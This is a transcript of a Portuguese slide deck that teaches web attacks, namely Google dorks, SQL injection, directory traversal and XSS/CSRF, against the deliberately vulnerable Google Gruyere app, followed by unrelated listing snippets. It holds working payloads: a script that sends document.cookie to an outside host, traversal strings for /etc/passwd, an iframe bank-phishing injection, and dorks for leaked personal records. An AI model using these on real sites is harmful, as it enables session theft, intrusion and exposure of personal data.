Ataques a Aplicações Web
|
|
- Daniel Rios Wagner
- 8 Há anos
- Visualizações:
Transcrição
1 Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa
2 Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL Injection 4. XSS 5. Um exemplo do dia-a-dia
3 Vulnerabilidades da web Fonte: Projeto OWASP
4 Information leakage? Consultas no Google! Podem equivaler a um nmap da web inurl:<domínio> ext:<extensão> <string> inurl:com.br ext:sql medico especialidade inurl:com.br ext:sql medico cpf
5 SQL Injection Ataque em que um formulário é preenchido com informações que interferem no fluxo de execução de consultas Frequentemente aplicado em etapas de login Geralmente, a seção de um sistema web onde há maior preocupação com segurança
6 Exemplo básico Isto: SELECT * FROM Bugs WHERE bug_id = $_GET['bugid']; Pode resultar nesta instrução! SELECT * FROM Bugs WHERE bug_id = 1234 OR TRUE;
7 Um caso pior! UPDATE Accounts SET password = SHA2('$password') WHERE account_id = $account_id; Vira... UPDATE Accounts SET password = SHA2( xyzzy ) WHERE account_id = 1234 OR TRUE
8 Directory traversal Tipo de ataque que faz com que uma aplicação web acesse um arquivo não-desejado Ocorre quanto um programa do tipo (geralmente um CGI) não trata adequadamente seus parâmetros de entrada Se um dos parâmetros indica um nome de arquivo, é possível manipulá-lo para que aponte para arquivos arbitrários no sistema do servidor
9 Exemplo básico (PHP/Linux) Suponha um script que suporte isto: jpg <?... /* le imagem a ser exibida */ arqimg = fopen( /amadoras/.$_get['arq'], r ); imagem = fread($handle, filesize($arqimg)); print $imagem; fclose($arqimg);?>
10 Imagine agora este acesso... /../../../../../../../../../etc/passwd
11 Directory traversal no Windows O caractere utilizado como separador de caminhos no Windows é \, o que de algum modo particulariza os ataques a esta plataforma Não obstante, cada vez mais APIs Windows têm suportado o caractere / em diretórios Uma vez que sistemas Windows não contam com uma árvore de diretórios unificada, ataques do tipo ficam restritos à partição em que os arquivos sendo servidos estiverem localizados
12 Variantes do ataque (1) Para evitar detecção por sistemas sensíveis a parâmetros que possuam caracteres como /, alguns ataques usam caminhos codificados Uma possibilidade é utilizar parâmetros com codificação de URL: seepic.cgi?arq=%2e%2e%2f... (../) seepic.cgi?arq=%2e%2e%5c... (..\)
13 Variantes do ataque (2) No passado, caracteres da plataforma Windows também podiam ser especificados por seu código Unicode Esta é uma codificação universal de 16 bits para representar símbolos em qualquer linguagem system32/cmd.exe?/c+dir+c:\ (%c0%af == '/') (%c1%9c == '\')
14 XSS Cross Site Scripting Através de um XSS, o Cracker injeta codigos JavaScript em um campo texto de uma página já existente e este JavaScript é apresentado para outros usuários. -- Wikipédia
15 XSRF (ou CSRF) Técnica em que o atacante se vale de informações de sessão previamente existentes no browser de um usuário para forjar requisições ou disparar ações nocivas Pode ser utilizado como parte de um ataque de XSS (cross-site scripting) Geralmente envolve algum tipo de engenharia social ou alguma forma de acesso à vítima
16 Google Gruyere Aplicação propositalmente desenvolvida com bugs Um testbed para experiências em segurança
17 Google Gruyere
18 Ataques orientados ao Gruyere Básicos Cadastrar um item com nome: zezi<a href="lalala">nho</a> Ou com o nome: <b>isto é um teste.</b><a href=" Ou ainda: <P class=dev>point your mouse <A onmouseover="alert('this is an alert box!')" href="">here</a></p>
19 Ataques orientados ao Gruyere Internet Explorer 9 (Ago/2011) <a href=" script>alert('segura PEAO')</script>">Este é o super novo queijo</a> <a href=" script>window.open(' cript>">este é o super novo queijo</a>
20 Ataques orientados ao Gruyere Começando a ficar sem-graça... <a href=" script>alert(document.cookie)</script>">este é o super novo queijo</a>
21 Ataques orientados ao Gruyere Fazendo algo desagradável... <a href=" tl?uid=<script>window.open(" odadosdoseubanco.com.br/salva.php?cook=" + document.cookie)</script>">este é o super novo queijo</a> Vejamos um exemplo de script para salvar dados...
22 Ataques orientados ao Gruyere Indo além do pedagógico! gtl?uid=%3ciframe%20src=%22http:// le.com.br%22%20width=%22100%%22%20height= %22100%%22%3E%3Cp%3EEntrar%20em%20contat o%20com%20o%20seu%20banco.%3c/p%3e%3c/if rame%3e
23 OPA!!! Será que isto tem a ver comigo??
24 Obrigado!! Carlos Nilton A. Corrêa
Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):
Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma
Leia maisSegurança na WEB Ambiente WEB estático
Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores
Leia mais... MANUAL DO MODERADOR SERVIÇOS DE WEB
... MANUAL DO MODERADOR SERVIÇOS DE WEB ÍNDICE 1. IMPLEMENTAÇÃO 4 1.1 PAINEL DE CONTROLE 4 1.2 SENHA 4 1.3 INSTALAÇÃO 4 1.3.1 INSTALAÇÃO PARA MODERADOR 4 1.3.2 INSTALAÇÃO PARA PARTICIPANTES 8 1.3.2.1 PELO
Leia mais13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com
13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro
Leia maisCriação de Aplicativos de redes sociais para Autenticação
Criação de Aplicativos de redes sociais para Autenticação 1 ÍNDICE... 2 1 OBJETIVO... 5 1.1 FINALIDADE... 5 2 CRIANDO APLICATIVO DO FACEBOOK... 6 2.1 NAVEGANDO NA PÁGINA HTTPS://DEVELOPERS.FACEBOOK.COM:...
Leia maisLinguagem de. Aula 06. Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br
Linguagem de Programação IV -PHP Aula 06 Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br Criação de Formulários o Um formulário consiste em uma série de campos que são preenchidos pelo usuário
Leia maisProva de pré-requisito
Prova de pré-requisito PHP & MySQL: Técnicas para Web 2.0 1 - Qual das opções constrói a tabela abaixo: DIA MÊS ANO 28 04 1988 22 02 2002 a) b) c) dia mês ano
Leia maisAplicação web protegida
Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos
Leia maisXSS - CROSS-SITE SCRIPTING
Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente
Leia maisSegurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1
Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/
Leia maisManual do SISC Sistema de Informações do Serviço de Convivência e Fortalecimento de Vínculos Perfil Gestor Estadual Abril/2014 Versão 1.
Manual do SISC Sistema de Informações do Serviço de Convivência e Fortalecimento de Vínculos Perfil Gestor Estadual Abril/2014 Versão 1.0 SUMÁRIO Manual do SISC... 3 1. Finalidade do SISC... 3 2. Requisitos
Leia maisVerifique se o Plugin do Flash Player está instalado no seu computador para a navegação adequada no portal.
1 Tutorial: Blogs no Clickideia Introdução Esse tutorial mostrará as funções básicas da ferramenta de Blog do Portal Educacional Clickideia. Ele foi elaborado pensando em diferentes níveis de usuários
Leia maisUNIVERSIDADE REGIONAL DE BLUMENAU DIVISÃO DE TECNOLOGIA DA INFORMAÇÃO
UNIVERSIDADE REGIONAL DE BLUMENAU DIVISÃO DE TECNOLOGIA DA INFORMAÇÃO MANUAL DE UTILIZAÇÃO DO DION (DIÁRIO ONLINE FURB) - PROFESSORES 1. ACESSANDO O SISTEMA O sistema DION está disponível no endereço www.furb.br/dion.
Leia maisInserindo e Listando registros
Inserindo e Listando registros Dando prosseguimento à aula anterior, agora precisaremos construir uma rotina que faça a inserção no banco de dados Escola. A ação agora é inserir o aluno na tabela alunos
Leia maisPÓS-GRADUAÇÃO EM MATEMÁTICA COMPUTACIONAL INFORMÁTICA INSTRUMENTAL Aula 06: Introdução Linguagem HTML
PÓS-GRADUAÇÃO EM MATEMÁTICA COMPUTACIONAL INFORMÁTICA INSTRUMENTAL Aula 06: Introdução Linguagem HTML O Desenvolvimento Web O desenvolvimento web é o termo utilizado para descrever atividade relacionada
Leia maisOrientações para Usuários
Sistema de Gestão de Certificados Eletrônicos Orientações para Usuários Organizadores de evento Controladores de qualidade Objetivos do Sistema Os principais objetivos da concepção do sistema são: automatização,
Leia maisLÓGICA DE PROGRAMAÇÃO. Professor Celso Masotti http://ead.celsomasotti.com.br
LÓGICA DE PROGRAMAÇÃO Professor Celso Masotti http://ead.celsomasotti.com.br Ano: 2015 1 HTML & PHP em Ambiente Web PARTE II Sumário I Decisão... 4 Operadores de Comparação... 6 II IF ELSEIF ELSE... 7
Leia maisComo criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo.
Como criar um blog Criando o blog Vá em www.blogger.com. Entre com sua conta google (a mesma que você usa para acessar o gmail). Escolha um perfil. Na página seguinte, clique no botão novo blog. Será aberta
Leia maisPortal de Aprendizado Tutorial do Aluno
Portal de Aprendizado Tutorial do Aluno Índice 1 Acessando o Portal... 2 1.1 Verificação do Browser... 2 1.2 Entre em contato... 3 1.3 Portal Autenticado... 5 2 Meus Cursos... 6 2.1 Matriculando-se em
Leia maisAmeaças, riscos e vulnerabilidades Cont. Objetivos
Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia
Leia maisPronto! Todos os instaladores correspondentes do filtro aplicado no passo 4 serão disponibilizados para download.
Painel de Chamadas Produto : Corpore RM TOTVS Hospitalar Chamado : R_SAU002\REQ024 Data da publicação : 16/07/15 País(es) : Brasil Banco(s) de Dados : POAD0005/SAUDEJOJI (SQL) POAD0005/HPD (Oracle) Melhoria
Leia maisSegurança em Sistemas Web. Addson A. Costa
Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.
Leia mais6 TESTES DE SEGURANÇA EM APLICAÇÕES WEB. 6.1 Comentários iniciais
54 6 TESTES DE SEGURANÇA EM APLICAÇÕES WEB 6.1 Comentários iniciais Este capítulo em toda sua extensão tem como base o guia de testes da OWASP - OWASP Testing Guide Versão 3.0 (MEUCCI, 2008). Tem como
Leia maisSegurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com
UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel
Leia maisManual do Cliente. Alu Tracker Monitoramento Veicular
Alu Tracker Monitoramento Veicular Manual do cliente Manual do Cliente Alu Tracker Monitoramento Veicular Introdução Este manual faz parte do contrato de prestação de serviços. Obrigado por escolher a
Leia maisManual de Instalação do e.sic - Sistema Municipal de Informações ao Cidadão
Manual de Instalação do e.sic - Sistema Municipal de Informações ao Cidadão Companhia de Processamento de Dados do Estado de São Paulo DDS Diretoria de Desenvolvimento de Sistemas SDS Superintendência
Leia maisMANUAL DE NOTÍCIAS NO PORTAL DA PBH
MANUAL PUBLICAÇÃO DE NOTÍCIAS NO PORTAL DA PBH Instruções para publicação de notícias no Portal PBH 1 Efetuando o acesso Para efetuar o login, acessar o endereço: www.pbh.gov.br/comunicacao/login ou https://ecp.pbh.gov.br/ecp
Leia maisJaspe versão 1.2. Manual do usuário Versão em Português
Jaspe versão 1.2 Manual do usuário Versão em Português Iniciando o Jaspe Ao iniciar o Jaspe, será aberta uma janela de identificação de usuário. Se for a primeira vez que você estiver iniciando o Jaspe,
Leia maisManual de Operação do CADSUS WEB Modo Consulta
Manual de Operação do CADSUS WEB Modo Consulta Agosto/2014 Sumário Sistema CADSUS WEB... 3 Orientações para Navegadores... 4 Acesso ao Sistema... 4 Página para Consulta... 5 Alteração de senha... 7 Perda
Leia maisProjeto ECA na Escola - Plataforma de Educação à Distância
Página1 Apresentação Projeto ECA na Escola - Plataforma de Educação à Distância Olá Participante do Projeto ECA na Escola, Este tutorial pretende auxiliá-lo na navegação na Plataforma de Educação à Distância
Leia maisSumário. Parte I Introdução 21. 1 Introdução 15 1.1 O Rails é ágil... 17 1.2 Explorando o conteúdo... 18 1.3 Agradecimentos... 19
Sumário 1 Introdução 15 1.1 O Rails é ágil.......................................................... 17 1.2 Explorando o conteúdo................................................... 18 1.3 Agradecimentos........................................................
Leia maisCLÍNICA TECNOLÓGICA CASOS DE TESTE. Palestrante: Marcia Silva MARCIA.SILVA@DATASUS.GOV.BR www.emersonrios.eti.br
CLÍNICA TECNOLÓGICA CASOS DE TESTE Palestrante: Marcia Silva MARCIA.SILVA@DATASUS.GOV.BR www.emersonrios.eti.br 1 REQUISITOS DE NEGÓCIO ESPECIFICAÇÃO FUNCIONAL Protótipo Planejamento dos testes Design
Leia maisTUTORIAL PARA O TUTOR VALIDAR BOLSA DE SUPERVISOR
PROJETO MAIS MÉDICOS PARA O BRASIL TUTORIAL PARA O TUTOR VALIDAR BOLSA DE SUPERVISOR Brasília/DF, 17 de novembro de 2015. 1 APRESENTAÇÃO Prezado (a) Tutor (a) participante do PROJETO MAIS MÉDICO PARA O
Leia mais1) Ao ser executado o código abaixo, em PHP, qual será o resultado impresso em tela?
Exercícios sobre Linguagem PHP: 1) Ao ser executado o código abaixo, em PHP, qual será o resultado impresso em tela? 2) Considere a linguagem de programação PHP e seus operadores. A execução da sentença:
Leia maisProf. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1
Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:
Leia maisBoletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema
Boletim Eletrônico de Recolhimento Manual do Sistema Versão 1.2 Junho / 2013 Sumário 1. Introdução... - 3-2. O Sistema BOLETIM ELETRÔNICO DE RECOLHIMENTO... - 3-3. Pré-requisitos... - 3-4. Primeiro Acesso...
Leia maisHTML Página 1. Índice
PARTE - 1 HTML Página 1 Índice HTML A HISTÓRIA... 2 O COMEÇO E A INTEROPERABILIADE... 3 Primeira Página... 4 Entendendo seu código... 5 Abrindo o código fonte da sua página... 6 Comentários na página...
Leia maisTutorial de Acesso ao AVA - Ambiente Virtual de Aprendizagem e-learning Consinco. Agosto 2015, versão 1
Tutorial de Acesso ao AVA - Ambiente Virtual de Aprendizagem e-learning Consinco Agosto 2015, versão 1 Consinco e-learning O Que é? Como Acessar? O Consinco e-learning é o portal de Ensino a Distância
Leia maisTUTORIAL DO CORRETOR DE IMÓVEIS PARA UTILIZAÇÃO DO SISTEMA :: REDE CERTA ::
TUTORIAL DO CORRETOR DE IMÓVEIS PARA UTILIZAÇÃO DO SISTEMA :: REDE CERTA :: Considerações iniciais >> O sistema é totalmente online, por isso dispensa a instalação de aplicativos em seu computador para
Leia maisPara o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.
POWERPOINT 1. O QUE É UMA APRESENTAÇÃO Para o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. Em cada slide podemos ter vários elementos ou objetos
Leia maisManual do Usuário. aneiro de 2008 Versão 1
Manual do Usuário Janeiro aneiro de 2008 Versão 1 Considerações Gerais O uso do sistema é obrigatório para todos que solicitam procedimentos que são executados dentro da Gestão Estadual. Ou seja, se o
Leia maisInstituto Siegen Manual do Professor
Manual do Professor - www.institutosiegen.com.br - 1 Instituto Siegen Manual do Professor Manual do Professor - www.institutosiegen.com.br - 2 Sumário Instituto Siegen...1 Manual do Professor...1 Funcionamento
Leia maisManual do Fórum do Meio Ambiente. Propõe instruções para primeiro acesso e funcionalidades básicas do sistema.
Manual do Fórum do Meio Ambiente Propõe instruções para primeiro acesso e funcionalidades básicas do sistema. Coordenação de Modernização CMO Secretaria do Meio Ambiente do Estado da Bahia Versão 1.0 2012
Leia maisMedical Office 2015 Instruções de Instalação e Configuração
Medical Office 2015 Instruções de Instalação e Configuração 1) Faça o download do Medica Office através do nosso site www.medicaloffice.com.br opção do Download; 2) Após realizado o download do arquivo
Leia maisTÉCNICAS DE PESQUISA AVANÇADA EM VÍDEOS NO GOOGLE
PROGRAMA INSTITUCIONAL DE BOLSA DE INICIAÇÃO À DOCÊNCIA PIBID UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE SUBPROJETO GEOGRAFIA/CERES PROJETO TECNOLOGIAS DIGITAIS E GEOGRAFIA TÉCNICAS DE PESQUISA AVANÇADA
Leia maisSegurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas
Leia maisBanco de Dados Oracle 10g: Introdução à Linguagem SQL
Oracle University Entre em contato: 0800 891 6502 Banco de Dados Oracle 10g: Introdução à Linguagem SQL Duração: 5 Dias Objetivos do Curso Esta classe se aplica aos usuários do Banco de Dados Oracle8i,
Leia maisGuia do Usuário do Aplicativo Desktop Client
Guia do Usuário do Aplicativo Desktop Client Versão 6 20/08/2010 OAISYS 7965 S. Priest Drive, Suite 105 Tempe, AZ 85284 (480) 496-9040 Guia do Usuário do Aplicativo OAISYS Desktop Client 1 Instalação Navegue
Leia maisTutorial para Atualização do Laboratório de Informática
Tutorial para Atualização do Laboratório de Informática Esse tutorial mostra os procedimentos a serem realizados para atualização correta do Laboratório de Informática. Leia atentamente o passo a passo
Leia maisManual de Posicionamento On-line
Manual de Posicionamento On-line Índice Solicitação de cadastro de senha... 3 Acessando as funcionalidades do site... 4 Alterar senha... 5 Posicionamento *... 5 * Apenas usuários cadastrados como despachante
Leia maisAcompanhamento e Execução de Projetos
Acompanhamento e Execução de Projetos Manual do Usuário Atualizado em: 28/11/2013 Página 1/24 Sumário 1. INTRODUÇÃO... 3 2. ABRANGÊNCIA DO SISTEMA... 3 3. DESCRIÇÃO DO SISTEMA... 3 4. COMO ACESSAR O SISTEMA...
Leia maiswww.profpimentel.com.br
CENTRAL DE CURSOS PROF. PIMENTEL 12/03/2016 SIMULADO - INFORMÁTICA TURMA - INSS - TÉCNICO DO SEGURO SOCIAL Você recebeu sua folha de respostas e este caderno contendo 30 questões objetivas. Leia cuidadosamente
Leia maisCADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word 2010. Sumário
CADERNO DE INFORMÁTICA FACITA Faculdade de Itápolis Aplicativos Editores de Texto WORD 2007/2010 Sumário Editor de texto... 3 Iniciando Microsoft Word... 4 Fichários:... 4 Atalhos... 5 Área de Trabalho:
Leia maisManual do usuário Sistema de Ordem de Serviço HMV/OS 5.0
Manual do usuário Sistema de Ordem de Serviço HMV/OS 5.0 DESENVOLVEDOR JORGE ALDRUEI FUNARI ALVES 1 Sistema de ordem de serviço HMV Apresentação HMV/OS 4.0 O sistema HMV/OS foi desenvolvido por Comtrate
Leia maisCOMO ADICIONAR BANNER ROTATIVO Portal Ebserh Site dos Hospitais Universitários
COMO ADICIONAR BANNER ROTATIVO Portal Ebserh Site dos Hospitais Universitários Versão 1.1 Histórico de Alteração Versão Descrição Autor 1.0 Criação do documento Renata Rezio 1.1 Manuais Pág. 2 de 10 Manual
Leia maisAula de JavaScript 05/03/10
Objetos Sabe-se que variável são contêiners que podem armazenar um número, uma string de texto ou outro valor. O JavaScript também suporta objetos. Objetos são contêiners que podem armazenar dados e inclusive
Leia maisLINX POSTOS AUTOSYSTEM
LINX POSTOS AUTOSYSTEM Manual Sumário 1 INTRODUÇÃO AO POSTGRES...3 2 INSTALAÇÃO...3 2.1 Download...3 2.2 Instalação...4 3 CONFIGURAÇÃO...7 3.1 CIDR-ADDRESS...8 3.2 Biometria...9 4 LINHA DE COMANDO...10
Leia maisManual do Usuário - Cliente Externo
Versão 3.0 SGCL - Sistema de Gestão de Conteúdo Local SUMÁRIO 1. INTRODUÇÃO... 4 1.1. Referências... 4 2. COMO ESTÁ ORGANIZADO O MANUAL... 4 3. FUNCIONALIDADES GERAIS DO SISTEMA... 5 3.1. Acessar a Central
Leia maisROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1
ROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1 Informações importantes sobre a emissão do Certificado A1: 1. Todos os certificados do tipo A1 emitidos no computador/usuário são gerados em um único Repositório
Leia maisUsando o NVU Parte 2: Inserindo imagens
Usando o NVU Parte 2: Inserindo imagens Simão Pedro P. Marinho Para uso exclusivo por alunos da PUC Minas Inserindo uma imagem que está no seu computador Inserindo uma imagem que já está na Internet Inserindo
Leia maisTutorial do Site das Escolas
SECRETARIA DE ESTADO DA EDUCAÇÃO SEED SUPERINTENDÊNCIA DE ESTADO DA EDUCAÇÃO SUED - DITEC - CAUTEC Tutorial do Site das Escolas SECRETARIA DE ESTADO DA EDUCAÇÃO DO PARANÁ Maurício Requião de Mello e Silva
Leia maisInstrução de Trabalho Registro de chamado no sistema OCOMON
Aprovado por Comitê da Qualidade Analisado Chefe do Departamento de Atendimento ao Usuário criticamente por 1. OBJETIVOS Orientar os atendentes que usam o sistema de controle e registro de ocorrências
Leia maisSIGA-CEIVAP MANUAL DO USUÁRIO 1
SIGA-CEIVAP MANUAL DO USUÁRIO 1 SIGA-CEIVAP MANUAL DO USUÁRIO 2 SUMÁRIO 1. APRESENTAÇÃO... 3 1.1 SIGA-CEIVAP... 3 2. FUNCIONALIDADES COMUNS AOS USUÁRIOS... 3 2.1 ACESSO AO SISTEMA... 3 2.1.1 ACESSANDO
Leia maisSegurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos
Leia maisAplicação de RMAs - Instruções
Aplicação de RMAs - Instruções 1 - Registo do Utilizador na Plataforma Existem duas possibilidades de um utilizador se registar na plataforma de RMAs. Utilizador com acesso ao site Utilizador sem acesso
Leia mais0800-728-2001 (Capitais e Interior) 0800-729-2001 (Demais Localidades) 0800-727-2001 (Capitais e Interior) Golden Fone (SAC)
Golden Fone (SAC) 0800-728-2001 (Capitais e Interior) Central Técnica 4004-2001 (Regiões Metropolitanas do Rio de Janeiro, São Paulo, Salvador, Belo Horizonte, Porto Alegre, Brasília e São Luís) 0800-729-2001
Leia maisJava NET: Interaja com a Internet. Ricardo Terra (rterrabh [at] gmail.com) Java NET: Interaja com a Internet Maio, 2011 1
Java NET: Interaja com a Internet Ricardo Terra rterrabh [at] gmail.com Ricardo Terra (rterrabh [at] gmail.com) Java NET: Interaja com a Internet Maio, 2011 1 CV Nome: Ricardo Terra Email: rterrabh [at]
Leia maisPEDIDOS WEB MANUAL DO USUÁRIO
PEDIDOS WEB MANUAL DO USUÁRIO CONTEÚDO Sobre o site... 2 Segurança -Trocar Senha... 4 Segurança Cadastrarusuários... 5 Configurações Preços... 6 Configurações Dados de Contato... 7 Configurações Assinatura
Leia maisINSCRIÇÃO ON- LINE REVEZAMENTOS A PARTIR DE 2015 INDICADO PARA TÉCNICOS
INSCRIÇÃO ON- LINE REVEZAMENTOS A PARTIR DE 2015 INDICADO PARA TÉCNICOS 2015 ABMN Escrito por Julian Romero jromero@abmn.org.br Revisão: 8 March 2015 CARACTERÍSTICAS DO SISTEMA O ACESSO É ATRAVÉS DE LOGIN
Leia mais(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com
(In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades
Leia maisMANUAL DO SISTEMA DE PATRIMÔNIO IMOBILIÁRIO SISPAT
MANUAL DO SISTEMA DE PATRIMÔNIO IMOBILIÁRIO SISPAT Tela de Resumo Esta tela é para simples visualização e impressão da ficha do resumo, permitindo inclusive a visualização de imóveis baixados, isto é,
Leia maisManual de Utilizador. Caderno. Recursos da Unidade Curricular. Gabinete de Ensino à Distância do IPP. http://eweb.ipportalegre.pt. ged@ipportalegre.
Manual de Utilizador Caderno Recursos da Unidade Curricular Gabinete de Ensino à Distância do IPP http://eweb.ipportalegre.pt ged@ipportalegre.pt Índice RECURSOS... 1 ADICIONAR E CONFIGURAR RECURSOS...
Leia maisPessoal, abaixo fiz um passo-a-passo de como configurar o DVR para acessar a internet, neste caso utilizei os seguintes itens:
Pessoal, abaixo fiz um passo-a-passo de como configurar o DVR para acessar a internet, neste caso utilizei os seguintes itens: - Modem T580 v2. - DVR Penttaxy 8 canais - 5 metros de cabo UTP pra ligar
Leia maisConfigurações dos Sistemas
Configurações dos Sistemas Sumário configurações dos sistemas Este manual do Configurações dos Sistemas tem por objetivo explicar as informações referentes a configuração do ambiente, como por exemplo,
Leia maisMANUAL DA SECRETARIA
MANUAL DA SECRETARIA Conteúdo Tela de acesso... 2 Liberação de acesso ao sistema... 3 Funcionários... 3 Secretaria... 5 Tutores... 7 Autores... 8 Configuração dos cursos da Instituição de Ensino... 9 Novo
Leia maisJOOPP O construtor de sites mais rápido do mundo!
O construtor de sites mais rápido do mundo! DIFERENÇAS ENTRE PÁGINA DO FACEBOOK (FANPAGE) E PERFIL Página no Facebook (Fanpage) Fanpage é uma página no facebook própria para empresas; Vantagens: Pode ser
Leia maisPaís(es) : Brasil Banco(s) de Dados : Sql Server / Oracle
Solicitação de Prontuários no Controle de Documentos Produto : RM Saúde / Controle de Documentos Chamado : R_SAU002/REQ028 Data da publicação : 10/09/14 País(es) : Brasil Banco(s) de Dados : Sql Server
Leia maisCeC. Cadastro Eletrônico de Contribuintes
CeC Cadastro Eletrônico de Contribuintes Versão 1.0 Usuário Externo Março/2010 Índice 1. Apresentação... 3 2. Objetivos... 3 3. Solicitação de CeC... 4 3.1. Cadastro de pessoas físicas... 5 3.1.1. Cadastro
Leia maisPersonal Home Page PHP. Prof. Luiz Claudio F. de Souza www.luizclaudiofs.blogspot.com
Personal Home Page PHP 1 O que é PHP? PHP (Personal Home Page) é uma linguagem que permite criar sites WEB dinâmicos, possibilitando uma interação com o usuário através de formulários, parâmetros da URL
Leia maisTutorial WEB Soluço es Click.
Tutorial WEB Soluço es Click. Sumário Sumário... 1 1. Acesso ao site:... 2 2. Login:... 3 3. Página Principal:... 4 4. Navegando sobre o menu:... 4 5. Opção Chamado:... 5 5.1 Tela de Chamados:... 6 5.1.1
Leia maisSegurança em aplicações Web. Exemplos e Casos Práticos em
Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header
Leia maisManual de Operação. Copyright 2011 - Todos os direitos reservados.
Manual de Operação Copyright 2011 - Todos os direitos reservados. SUMÁRIO 1. Informações Gerais...7 1.1 EasyPass... 7 1.2 Observações... 8 2. Conceitos Básicos...10 2.1 Captura de Imagem...10 2.2 Crop...10
Leia maisUNIVERSIDADE ESTADUAL DE GOIÁS PROCESSO SELETIVO SIMPLIFICADO Edital nº. 003-2010 CARGO: TÉCNICO ADMINISTRATIVO DE NÍVEL MÉDIO
UNIVERSIDADE ESTADUAL DE GOIÁS PROCESSO SELETIVO SIMPLIFICADO Edital nº. 003-2010 CARGO: TÉCNICO ADMINISTRATIVO DE NÍVEL MÉDIO Nome: RG: CPF: Nº. de inscrição: Função: Este caderno contém a prova de Informática
Leia maisSegurança da Informação:
Segurança da Informação: Tratando dados em PHP Objetivo: O objetivo desta palestra é demonstrar os riscos inerentes de se trabalhar com informações externas à aplicações desenvolvidas em PHP, como o descuido
Leia maisALTERAÇÃO DAS CONFI GURAÇÕES PESSOAI S... 3 I NSERÇÃO DE M ATERI AL NO PORTAL... 3 1. NOTÍ CI A... 3 2. EVENTO... 4 3. PÁGI NA... 4 4. I MAGEM...
GUIA DO USUÁRIO CGI ALTERAÇÃO DAS CONFI GURAÇÕES PESSOAI S... 3 I NSERÇÃO DE M ATERI AL NO PORTAL... 3 1. NOTÍ CI A... 3 2. EVENTO... 4 3. PÁGI NA... 4 4. I MAGEM... 5 5. ARQUI VO... 6 6. DOCUMENTO...
Leia maisSite Fácil. Guia do Usuário. PROCERGS Divisão 5
Site Fácil Guia do Usuário PROCERGS Divisão 5 Este documento foi produzido pela PROCERGS - Divisão 5. Praça dos Açorianos, s/n - CEP 90010-340 Porto Alegre, RS (051) 210-3100 http:\\www.procergs.com.br
Leia maisLinguagem de Programação JAVA. Técnico em Informática Professora Michelle Nery
Linguagem de Programação JAVA Técnico em Informática Professora Michelle Nery Agenda Regras paravariáveis Identificadores Válidos Convenção de Nomenclatura Palavras-chaves em Java Tipos de Variáveis em
Leia maisSUPORTE TÉCNICO SUPORTE PARA ACESSO À FATURA NA INTERNET
